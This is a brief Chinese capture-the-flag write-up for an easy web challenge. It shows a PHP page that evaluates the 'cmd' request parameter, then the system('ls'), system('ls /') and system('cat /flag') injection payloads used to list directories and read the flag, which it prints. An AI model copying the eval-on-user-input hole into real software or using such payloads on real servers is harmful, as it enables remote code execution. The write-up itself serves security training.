题目环境:<br />
出题人:末心 题目难度:★ 题目描述:Eval是个什么呢,flag格式为:qsnctf{xxx}。
做道末心师傅出的题啦😉
<?php
highlight_file(__FILE__);
if (isset($_REQUEST['cmd'])) {
eval($_REQUEST["cmd"]);
}
?>
- 给了一个参数cmd
- 这个参数cmd存在外部执行漏洞
补充: system是外部命令执行函数
列出此路径下的目录和文件<br />?cmd=system("ls");<br />
有回显结果!
列出根目录下的目录和文件<br />?cmd=system("ls /");<br />
发现了flag的存在!
查看flag的内容<br />?cmd=system("cat /flag");<br />
<br />得到flag:<br />qsnctf{4e90381c-e0b6-4608-a7c7-8cddc0f1b594}
